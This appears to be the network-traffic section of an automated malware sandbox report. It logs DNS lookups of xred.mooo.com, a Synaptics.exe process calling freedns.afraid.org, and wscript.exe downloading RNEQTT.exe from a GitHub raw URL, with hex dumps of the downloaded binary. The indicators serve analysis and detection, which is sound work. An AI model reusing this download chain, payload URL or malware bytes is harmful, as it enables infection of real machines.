                                                                                                                                                                Dec 25, 2024 09:08:55.650333881 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.650413990 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.650521994 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.343364000 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.343511105 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.343772888 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.343776941 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.347610950 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.347615004 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.351547956 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.351634026 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.360058069 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.360085011 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.360521078 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.360584974 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.363506079 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.363522053 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.363732100 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.363787889 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.364943981 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.365314007 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.365326881 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.365667105 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.365673065 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.366528034 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.411328077 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.411335945 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.245775938 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.246028900 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.246068954 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.246253967 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.246460915 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.246525049 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.246599913 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.247822046 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.247869015 CET44350154142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.247931957 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.248136997 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.248150110 CET44350154142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259016991 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259077072 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259088993 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259129047 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259195089 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259223938 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259330034 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259715080 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259789944 CET44350155142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259875059 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.260087013 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.260122061 CET44350155142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275005102 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275046110 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275068998 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275082111 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275120974 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275132895 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275173903 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275820017 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275830984 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.276576996 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.276592970 CET44350156142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.276702881 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.277041912 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.277053118 CET44350156142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521420956 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521492004 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521522045 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521650076 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521656990 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521702051 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521709919 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521821022 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521825075 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521862984 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521867037 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521914005 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.522187948 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.522202969 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.522789955 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.522800922 CET44350158142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.522919893 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.523144960 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.523156881 CET44350158142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.657898903 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.657923937 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.658011913 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:03.658024073 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:03.659332991 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.659394026 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.659612894 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.660250902 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.660295963 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.661684036 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.661714077 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.661907911 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.662853003 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.662866116 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.348068953 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.348162889 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:05.348711967 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.349256992 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:05.349931955 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.350004911 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:05.350574017 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.350635052 CET50161443192.168.2.4142.250.181.14
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                Dec 25, 2024 09:08:55.896200895 CET6188253192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:56.034449100 CET53618821.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.850810051 CET5162053192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:09:02.989532948 CET53516201.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:22.547324896 CET6346453192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:09:22.684506893 CET53634641.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 25, 2024 09:06:59.825227976 CET | 192.168.2.4 | 1.1.1.1 | 0xd986 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:23.054270983 CET | 192.168.2.4 | 1.1.1.1 | 0x3356 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:23.865843058 CET | 192.168.2.4 | 1.1.1.1 | 0x8f89 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:24.231812000 CET | 192.168.2.4 | 1.1.1.1 | 0x3222 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:26.102535009 CET | 192.168.2.4 | 1.1.1.1 | 0x6f36 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:29.315047979 CET | 192.168.2.4 | 1.1.1.1 | 0xf930 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:35.144891977 CET | 192.168.2.4 | 1.1.1.1 | 0x8903 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:39.935925007 CET | 192.168.2.4 | 1.1.1.1 | 0x30b2 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:45.880687952 CET | 192.168.2.4 | 1.1.1.1 | 0x188b | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:52.904930115 CET | 192.168.2.4 | 1.1.1.1 | 0x1793 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:59.993002892 CET | 192.168.2.4 | 1.1.1.1 | 0xe842 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:06.943260908 CET | 192.168.2.4 | 1.1.1.1 | 0x23f5 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:13.915927887 CET | 192.168.2.4 | 1.1.1.1 | 0xb374 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:20.892265081 CET | 192.168.2.4 | 1.1.1.1 | 0x894d | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:27.816040993 CET | 192.168.2.4 | 1.1.1.1 | 0x8391 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:34.768434048 CET | 192.168.2.4 | 1.1.1.1 | 0xd74e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:39.518984079 CET | 192.168.2.4 | 1.1.1.1 | 0xbdcc | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:45.331218004 CET | 192.168.2.4 | 1.1.1.1 | 0xa1d6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:50.029160976 CET | 192.168.2.4 | 1.1.1.1 | 0x767c | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:55.896200895 CET | 192.168.2.4 | 1.1.1.1 | 0xae77 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:09:02.850810051 CET | 192.168.2.4 | 1.1.1.1 | 0x7153 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:09:22.547324896 CET | 192.168.2.4 | 1.1.1.1 | 0x95e7 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 25, 2024 09:06:59.962264061 CET | 1.1.1.1 | 192.168.2.4 | 0xd986 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:06:59.962264061 CET | 1.1.1.1 | 192.168.2.4 | 0xd986 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:06:59.962264061 CET | 1.1.1.1 | 192.168.2.4 | 0xd986 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:06:59.962264061 CET | 1.1.1.1 | 192.168.2.4 | 0xd986 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:23.190854073 CET | 1.1.1.1 | 192.168.2.4 | 0x3356 | No error (0) | docs.google.com | | 142.250.181.14 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:24.226063013 CET | 1.1.1.1 | 192.168.2.4 | 0x8f89 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:24.544472933 CET | 1.1.1.1 | 192.168.2.4 | 0x3222 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:26.239525080 CET | 1.1.1.1 | 192.168.2.4 | 0x6f36 | No error (0) | drive.usercontent.google.com | | 142.250.181.97 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:29.453108072 CET | 1.1.1.1 | 192.168.2.4 | 0xf930 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:35.281929970 CET | 1.1.1.1 | 192.168.2.4 | 0x8903 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:40.073894024 CET | 1.1.1.1 | 192.168.2.4 | 0x30b2 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:46.018011093 CET | 1.1.1.1 | 192.168.2.4 | 0x188b | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:53.042840958 CET | 1.1.1.1 | 192.168.2.4 | 0x1793 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:07:53.359473944 CET | 1.1.1.1 | 192.168.2.4 | 0x78a5 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 25, 2024 09:07:53.359473944 CET | 1.1.1.1 | 192.168.2.4 | 0x78a5 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:00.130219936 CET | 1.1.1.1 | 192.168.2.4 | 0xe842 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:07.080657005 CET | 1.1.1.1 | 192.168.2.4 | 0x23f5 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:14.052505970 CET | 1.1.1.1 | 192.168.2.4 | 0xb374 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:21.029758930 CET | 1.1.1.1 | 192.168.2.4 | 0x894d | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:26.133095980 CET | 1.1.1.1 | 192.168.2.4 | 0xbf12 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 25, 2024 09:08:26.133095980 CET | 1.1.1.1 | 192.168.2.4 | 0xbf12 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:27.953552008 CET | 1.1.1.1 | 192.168.2.4 | 0x8391 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:34.906083107 CET | 1.1.1.1 | 192.168.2.4 | 0xd74e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:39.656625032 CET | 1.1.1.1 | 192.168.2.4 | 0xbdcc | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:45.468411922 CET | 1.1.1.1 | 192.168.2.4 | 0xa1d6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:50.165954113 CET | 1.1.1.1 | 192.168.2.4 | 0x767c | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:08:56.034449100 CET | 1.1.1.1 | 192.168.2.4 | 0xae77 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:09:02.989532948 CET | 1.1.1.1 | 192.168.2.4 | 0x7153 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 09:09:22.684506893 CET | 1.1.1.1 | 192.168.2.4 | 0x95e7 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                                • docs.google.com
                                                                                                                                                                • drive.usercontent.google.com
                                                                                                                                                                • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49745 | 69.42.215.252 | 80 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 25, 2024 09:07:24.681916952 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                User-Agent: MyApp
                                                                                                                                                                Host: freedns.afraid.org
                                                                                                                                                                Cache-Control: no-cache
Dec 25, 2024 09:07:25.916393995 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.199.108.133 | 443 | 5544 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:01 UTC | 375 | OUT | GET /knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-ch
                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                Connection: Keep-Alive
2024-12-25 08:07:01 UTC | 903 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 1688576
                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                ETag: "f4ee902a55c293ed4c24b0e1ccded49d3b64ed7008f2f7c8fb5e14121e99838f"
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                X-GitHub-Request-Id: CA7E:20465E:2C25DE:31D3D5:676BBD25
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:01 GMT
                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                X-Served-By: cache-ewr-kewr1740036-EWR
                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                X-Timer: S1735114021.494368,VS0,VE102
                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                X-Fastly-Request-ID: 6461356311f259b1c6953a6eb4dba7e8f567f46c
                                                                                                                                                                Expires: Wed, 25 Dec 2024 08:12:01 GMT
                                                                                                                                                                Source-Age: 0
                                                                                                                                                                Data Ascii: hI'[]S;IuPIPH8;uy$I3T$y$ITP[P[@(IJ;rJ;r(IuI3S|[|[II
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 55 8b ec 83 c4 f8 53 56 57 8b d8 80 3d c4 e5 49 00 00 75 09 e8 fb f8 ff ff 84 c0 74 08 81 fb f8 ff ff 7f 7e 0a 33 c0 89 45 fc e9 54 01 00 00 33 c9 55 68 04 23 40 00 64 ff 31 64 89 21 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 20 f2 ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f 93 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 24 e6 49 00 8b 54 82 f4 85 d2 74 79 8b f2 8b c6 03 c3 83 20 fe 8b 42 04 3b d0 75 1a 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 0d 24 e6 49 00 33 ff 89 7c 81 f4 eb 26 8b cb 85 c9 79 03 83 c1 03 c1 f9 02 8b 3d 24 e6 49 00 89 44 8f f4 8b 0a 89 4d f8 8b 4d f8 89 41 04 8b 4d f8 89 08 8b c6 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 b4 e5 49 00 83 eb 04 01 1d b8 e5 49 00 e8 a2 21 00 00 e9 84 00 00 00
                                                                                                                                                                Data Ascii: USVW=Iut~3ET3Uh#@d1d!=MIthI }y$ITty B;uy$I3|&y=$IDMMAMREII!
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: c0 74 05 89 5d fc eb 36 8b c6 e8 8f fa ff ff 8b f8 8b c3 83 e8 04 8b 00 25 fc ff ff 7f 83 e8 04 3b f0 7d 02 8b c6 85 ff 74 11 8b d7 8b cb 91 e8 be 02 00 00 8b c3 e8 f3 fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 50 27 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 b8 ec ff ff c3 e9 f2 1b 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8d 40 00 53 85 c0 7e 15 ff 15 44 b0 49 00 8b d8 85 db 75 0b b0 01 e8 44 01 00 00 eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 48 b0 49 00 8b d8 85 db 74 0b b0 02 e8 24 01 00 00 eb 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 4c b0 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 48 b0 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 44 b0 49 00 59 09 c0 74 e7 89 01 c3
                                                                                                                                                                Data Ascii: t]6%;}t}3ZYYdhP'@=MIthIE_^[Y]@S~DIuD3[StHIt$3[t2tPLIYtHIutPDIYt
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 06 ff 15 2c e0 49 00 b8 d2 00 00 00 e9 d3 1c 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 02 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00 75 07 c7 43 18 70 2d 40 00 8b c3 ff 53 18 8b d8 85 db 74 07 8b c3 e8 31 fc ff ff 8b c3 5e 5b c3 66 ba b1 d7 e8 9f ff ff ff c3 8b c0 53 8b d8 33 c0 89 43 10 33 c0 89 43 0c 6a 00 8d 43 10 50 8b 43 08 50 8b 43 14 50 8b 03 50 e8 6d e5 ff ff 85 c0 75 0e e8 e4 e5 ff ff 83 f8 6d 75 06 33 c0 5b c3 33 c0 5b c3 8d 40 00 33 c0 c3 90 53 56 51 8b d8 8b 73 0c 85 f6 75 04 33 c0 eb 26 6a 00 8d 44 24 04 50 56 8b 43 14 50 8b 03 50 e8 54 e5 ff ff 85 c0 75 07 e8 a3 e5 ff ff eb 02 33 c0 33 d2 89 53 0c 5a 5e 5b c3 8b c0 53 8b d8 53 e8 db e4 ff ff 48 0f
                                                                                                                                                                Data Ascii: ,ISVfCf=rf=vf+f=tfs{Hu{uCp-@St1^[fS3C3CjCPCPCPPmumu3[3[@3SVQsu3&jD$PVCPPTu33SZ^[SSH
